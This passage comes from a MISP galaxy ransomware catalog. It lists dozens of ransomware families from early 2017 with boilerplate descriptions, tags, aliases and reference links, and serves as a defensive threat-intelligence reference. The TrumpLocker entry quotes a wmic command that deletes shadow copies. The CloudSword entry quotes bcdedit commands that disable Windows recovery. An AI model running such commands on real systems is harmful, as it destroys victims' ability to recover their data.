This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="EnjeyCrypter Ransomware"

Table 7941. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/enjey-crypter-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-10th-2017-spora-cerber-and-technical-writeups/

https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/

Dangerous Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Dangerous Ransomware"

Table 7942. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/dangerous-ransomware.html

Vortex Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Vortex Ransomware"

Vortex Ransomware is also known as:

  • Ŧl๏tєгค гคภร๏๓ฬคгє

Table 7943. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/vortex-ransomware.html

https://twitter.com/struppigel/status/839778905091424260

GC47 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="GC47 Ransomware"

Table 7944. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/gc47-ransomware.html

RozaLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="RozaLocker Ransomware"

RozaLocker Ransomware is also known as:

  • Roza

Table 7945. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/rozalocker-ransomware.html

https://twitter.com/jiriatvirlab/status/840863070733885440

CryptoMeister Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="CryptoMeister Ransomware"

Table 7946. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/cryptomeister-ransomware.html

GG Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Poses as Hewlett-Packard 2016.

The tag is: misp-galaxy:ransomware="GG Ransomware"

Table 7947. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/gg-ransomware.html

Project34 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Project34 Ransomware"

Table 7948. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/project34-ransomware.html

PetrWrap Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="PetrWrap Ransomware"

Table 7949. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/petrwrap-ransomware.html

https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/

https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/

Karmen Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. RaaS, based on HiddenTear.

The tag is: misp-galaxy:ransomware="Karmen Ransomware"

Table 7950. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/

https://id-ransomware.blogspot.co.il/2017/03/karmen-ransomware.html

https://twitter.com/malwrhunterteam/status/841747002438361089

Revenge Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. CryptoMix / CryptFile2 variant.

The tag is: misp-galaxy:ransomware="Revenge Ransomware"

Table 7951. Table References

Links

https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/

https://id-ransomware.blogspot.co.il/2017/03/revenge-ransomware.html

Turkish FileEncryptor Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Turkish FileEncryptor Ransomware"

Turkish FileEncryptor Ransomware is also known as:

  • Fake CTB-Locker

Table 7952. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/turkish-fileencryptor.html

https://twitter.com/JakubKroustek/status/842034887397908480

Kirk Ransomware & Spock Decryptor

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Payments in Monero.

The tag is: misp-galaxy:ransomware="Kirk Ransomware & Spock Decryptor"

Kirk Ransomware & Spock Decryptor is also known as:

  • Kirk & Spock Decryptor

Table 7953. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/kirkspock-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/

https://www.bleepingcomputer.com/forums/t/642239/kirk-ransomware-help-support-topic-kirk-extension-ransom-notetxt/

http://www.networkworld.com/article/3182415/security/star-trek-themed-kirk-ransomware-has-spock-decryptor-demands-ransom-be-paid-in-monero.html

http://www.securityweek.com/star-trek-themed-kirk-ransomware-emerges

https://www.grahamcluley.com/kirk-ransomware-sports-star-trek-themed-decryptor-little-known-crypto-currency/

https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/

ZinoCrypt Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="ZinoCrypt Ransomware"

Table 7954. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html

https://twitter.com/demonslay335?lang=en

https://twitter.com/malwrhunterteam/status/842781575410597894

Crptxxx Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Uses @enigma0x3’s UAC bypass.

The tag is: misp-galaxy:ransomware="Crptxxx Ransomware"

Table 7955. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html

https://www.bleepingcomputer.com/forums/t/609690/ultracrypter-cryptxxx-ultradecrypter-ransomware-help-topic-crypt-cryp1/page-84

http://www.fixinfectedpc.com/uninstall-crptxxx-ransomware-from-pc

https://twitter.com/malwrhunterteam/status/839467168760725508

MOTD Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="MOTD Ransomware"

Table 7956. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html

https://www.bleepingcomputer.com/forums/t/642409/motd-of-ransome-hostage/

https://www.bleepingcomputer.com/forums/t/642409/motd-ransomware-help-support-topics-motdtxt-and-enc-extension/

CryptoDevil Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="CryptoDevil Ransomware"

Table 7957. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/cryptodevil-ransomware.html

https://twitter.com/PolarToffee/status/843527738774507522

FabSysCrypto Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="FabSysCrypto Ransomware"

Table 7958. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/fabsyscrypto-ransomware.html

https://twitter.com/struppigel/status/837565766073475072

Lock2017 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Lock2017 Ransomware"

Table 7959. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/lock2017-ransomware.html

RedAnts Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="RedAnts Ransomware"

Table 7960. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/redants-ransomware.html

ConsoleApplication1 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="ConsoleApplication1 Ransomware"

Table 7961. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/consoleapplication1-ransomware.html

KRider Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="KRider Ransomware"

Table 7962. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/krider-ransomware.html

https://twitter.com/malwrhunterteam/status/836995570384453632

CYR-Locker Ransomware (FAKE)

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The following note is what you get if you put in the wrong key code: https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg

The tag is: misp-galaxy:ransomware="CYR-Locker Ransomware (FAKE)"

Table 7963. Table References

Links

https://id-ransomware.blogspot.co.il/search?updated-min=2017-01-01T00:00:00-08:00&updated-max=2018-01-01T00:00:00-08:00&max-results=50

DotRansomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="DotRansomware"

Table 7964. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/dotransomware.html

Unlock26 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Unlock26 Ransomware"

Table 7965. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/unlock26-ransomware.html

https://www.bleepingcomputer.com/news/security/new-raas-portal-preparing-to-spread-unlock26-ransomware/

PicklesRansomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Python ransomware.

The tag is: misp-galaxy:ransomware="PicklesRansomware"

PicklesRansomware is also known as:

  • Pickles

Table 7966. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/pickles-ransomware.html

https://twitter.com/JakubKroustek/status/834821166116327425

Vanguard Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. This ransomware poses as MS Office to fool users into opening the infected file. Go ransomware.

The tag is: misp-galaxy:ransomware="Vanguard Ransomware"

Table 7967. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/vanguard-ransomware.html

https://twitter.com/JAMESWT_MHT/status/834783231476166657

PyL33T Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="PyL33T Ransomware"

Table 7968. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/pyl33t-ransomware.html

https://twitter.com/Jan0fficial/status/834706668466405377

TrumpLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. This is the old VenusLocker in disguise. To delete shadow copies, the following command is used: C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit https://2.bp.blogspot.com/-8qIiBHnE9yU/WK1mZn3LgwI/AAAAAAAAD-M/ZKl7_Iwr1agYtlVO3HXaUrwitcowp5_NQCLcB/s1600/lock.jpg

The tag is: misp-galaxy:ransomware="TrumpLocker Ransomware"

Table 7969. Table References

Links

https://www.bleepingcomputer.com/news/security/new-trump-locker-ransomware-is-a-fraud-just-venuslocker-in-disguise/

https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-24th-2017-trump-locker-macos-rw-and-cryptomix/

Damage Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Written in Delphi.

The tag is: misp-galaxy:ransomware="Damage Ransomware"

Table 7970. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/damage-ransomware.html

https://decrypter.emsisoft.com/damage

https://twitter.com/demonslay335/status/835664067843014656

XYZWare Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="XYZWare Ransomware"

Table 7971. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/xyzware-ransomware.html

https://twitter.com/malwrhunterteam/status/833636006721122304

YouAreFucked Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="YouAreFucked Ransomware"

YouAreFucked Ransomware is also known as:

  • FortuneCrypt

Table 7972. Table References

Links

https://www.enigmasoftware.com/youarefuckedransomware-removal/

CryptConsole 2.0 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="CryptConsole 2.0 Ransomware"

Table 7973. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

BarRax Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="BarRax Ransomware"

BarRax Ransomware is also known as:

  • BarRaxCrypt Ransomware

Table 7974. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/barraxcrypt-ransomware.html

https://twitter.com/demonslay335/status/835668540367777792

CryptoLocker by NTK Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="CryptoLocker by NTK Ransomware"

Table 7975. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptolocker-by-ntk-ransomware.html

UserFilesLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="UserFilesLocker Ransomware"

UserFilesLocker Ransomware is also known as:

  • CzechoSlovak Ransomware

Table 7976. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/userfileslocker-ransomware.html

AvastVirusinfo Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. PAYING RANSOM IS USELESS, YOUR FILES WILL NOT BE FIXED. THE DAMAGE IS PERMANENT!!!!

The tag is: misp-galaxy:ransomware="AvastVirusinfo Ransomware"

Table 7977. Table References

Links

https://id-ransomware.blogspot.co.il/2017_03_01_archive.html

https://id-ransomware.blogspot.co.il/2017/03/avastvirusinfo-ransomware.html

SuchSecurity Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="SuchSecurity Ransomware"

SuchSecurity Ransomware is also known as:

  • Such Security

Table 7978. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/suchsecurity-ransomware.html

PleaseRead Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="PleaseRead Ransomware"

PleaseRead Ransomware is also known as:

  • VHDLocker Ransomware

Table 7979. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/vhd-ransomware.html

Kasiski Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Kasiski Ransomware"

Table 7980. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/kasiski-ransomware.html

https://twitter.com/MarceloRivero/status/832302976744173570

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/

Fake Locky Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Fake Locky Ransomware"

Fake Locky Ransomware is also known as:

  • Locky Impersonator Ransomware

Table 7981. Table References

Links

https://www.bleepingcomputer.com/news/security/the-locky-ransomware-encrypts-local-files-and-unmapped-network-shares/

https://id-ransomware.blogspot.co.il/2017/02/locky-impersonator.html

https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-thor-extension-after-being-a-bad-malware/

CryptoShield 1.0 Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. CryptoShield 1.0 is a ransomware from the CryptoMix family.

The tag is: misp-galaxy:ransomware="CryptoShield 1.0 Ransomware"

Table 7982. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptoshield-2-ransomware.html

https://www.bleepingcomputer.com/news/security/cryptomix-variant-named-cryptoshield-1-0-ransomware-distributed-by-exploit-kits/

Hermes Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. File marker: "HERMES"

The tag is: misp-galaxy:ransomware="Hermes Ransomware"

Table 7983. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/hermes-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/

https://www.bleepingcomputer.com/forums/t/642019/hermes-ransomware-help-support-decrypt-informationhtml/

https://www.bleepingcomputer.com/news/security/hermes-ransomware-decrypted-in-live-video-by-emsisofts-fabian-wosar/

LoveLock Ransomware or Love2Lock Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="LoveLock Ransomware or Love2Lock Ransomware"

LoveLock Ransomware or Love2Lock Ransomware is also known as:

  • LoveLock

  • Love2Lock

Table 7984. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/lovelock-ransomware.html

Wcry Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Wcry Ransomware"

Table 7985. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/wcry-ransomware.html

DUMB Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="DUMB Ransomware"

Table 7986. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/dumb-ransomware.html

https://twitter.com/bleepincomputer/status/816053140147597312?lang=en

X-Files

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="X-Files"

Table 7987. Table References

Links

https://id-ransomware.blogspot.co.il/2017_02_01_archive.html

https://id-ransomware.blogspot.co.il/2017/02/x-files-ransomware.html

Polski Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is $249, and the hacker demands that the victim get in contact through e-mail and a Polish messenger called Gadu-Gadu.

The tag is: misp-galaxy:ransomware="Polski Ransomware"

Table 7988. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/polski-ransomware.html

YourRansom Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. This hacker demands that the victim contact him through email, and decrypts the files for FREE (more info in the link below).

The tag is: misp-galaxy:ransomware="YourRansom Ransomware"

Table 7989. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html

https://www.bleepingcomputer.com/news/security/yourransom-is-the-latest-in-a-long-line-of-prank-and-educational-ransomware/

https://twitter.com/_ddoxer/status/827555507741274113

Ranion RaasRansomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Ranion RaaS gives regular people the opportunity to buy and distribute ransomware for a very cheap price (more info in the link below). RaaS service.

The tag is: misp-galaxy:ransomware="Ranion RaasRansomware"

Table 7990. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/ranion-raas.html

https://www.bleepingcomputer.com/news/security/ranion-ransomware-as-a-service-available-on-the-dark-web-for-educational-purposes/

Potato Ransomware

Wants a ransom to get the victim’s files back. Originated in English. Spread worldwide.

The tag is: misp-galaxy:ransomware="Potato Ransomware"

Table 7991. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/polato-ransomware.html

of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)

This ransomware originated in English and therefore could be used worldwide. It is spread with the help of email spam, fake ads, fake updates and infected install files.

The tag is: misp-galaxy:ransomware="of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)"

Table 7992. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html

RansomPlus

The author of this ransomware is sergej. The ransom is 0.25 bitcoins for the return of files. Originated in English. Used worldwide. This ransomware is spread with the help of email spam, fake ads, fake updates and infected install files.

The tag is: misp-galaxy:ransomware="RansomPlus"

Table 7993. Table References

Links

http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html

https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html

https://twitter.com/jiriatvirlab/status/825411602535088129

CryptConsole

This ransomware does not actually encrypt your files, but only changes their names, just like Globe Ransomware. This ransomware is spread with the help of email spam, fake ads, fake updates and infected install files.

The tag is: misp-galaxy:ransomware="CryptConsole"

Table 7994. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html

https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/

https://twitter.com/PolarToffee/status/824705553201057794

https://twitter.com/demonslay335/status/1004351990493741057

https://twitter.com/demonslay335/status/1004803373747572736

ZXZ Ramsomware

Originated in English and could affect users worldwide; however, so far there are only reports from Saudi Arabia. The malware name as found by Windows server tools is win32/wagcrypt.A.

The tag is: misp-galaxy:ransomware="ZXZ Ramsomware"

Table 7995. Table References

Links

https://www.bleepingcomputer.com/forums/t/638191/zxz-ransomware-support-help-topic-zxz/?hl=%2Bzxz#entry4168310

https://id-ransomware.blogspot.co.il/2017/01/zxz-ransomware.html

VxLock Ransomware

Developed in Visual Studio in 2010. Its original name is VxCrypt. This ransomware encrypts your files, including photos, music, MS Office, Open Office, PDF, etc.

The tag is: misp-galaxy:ransomware="VxLock Ransomware"

Table 7996. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/vxlock-ransomware.html

FunFact Ransomware

FunFact uses open GNU Privacy Guard (GnuPG) code, then asks the victim to email them to find out the amount of bitcoin to send (to receive a decrypt code). Written in English, it can attack all over the world. The ransom is 1.22038 BTC, which is 1100 USD.

The tag is: misp-galaxy:ransomware="FunFact Ransomware"

Table 7997. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/funfact.html

http://www.enigmasoftware.com/funfactransomware-removal/

ZekwaCrypt Ransomware

First spotted in May 2016, however it made a big comeback in January 2017. It’s directed to English-speaking users and is therefore able to infect worldwide. The ransomware is spread with the help of email spam, fake ads, fake updates and infected install files.

The tag is: misp-galaxy:ransomware="ZekwaCrypt Ransomware"

Table 7998. Table References

Links

https://id-ransomware.blogspot.co.il/2016/06/zekwacrypt-ransomware.html

http://www.2-spyware.com/remove-zekwacrypt-ransomware-virus.html

Sage 2.0 Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. This ransomware attacks your MS Office by offering a macro to help with your program, but instead encrypts all your files if the user is not protected. Its predecessor is CryLocker.

The tag is: misp-galaxy:ransomware="Sage 2.0 Ransomware"

Table 7999. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/sage-2-ransomware.html

https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/

http://www.securityweek.com/sage-20-ransomware-demands-2000-ransom

https://www.bleepingcomputer.com/news/security/sage-2-0-ransomware-gearing-up-for-possible-greater-distribution/

https://www.govcert.admin.ch/blog/27/sage-2.0-comes-with-ip-generation-algorithm-ipga

CloudSword Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. Uses the name “Window Update” to confuse its victims. It then imitates the Windows update process while turning off Windows Startup Repair and changing the BootStatusPolicy using these commands:

bcdedit.exe /set {default} recoveryenabled No
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

The tag is: misp-galaxy:ransomware="CloudSword Ransomware"

Table 8000. Table References

Links

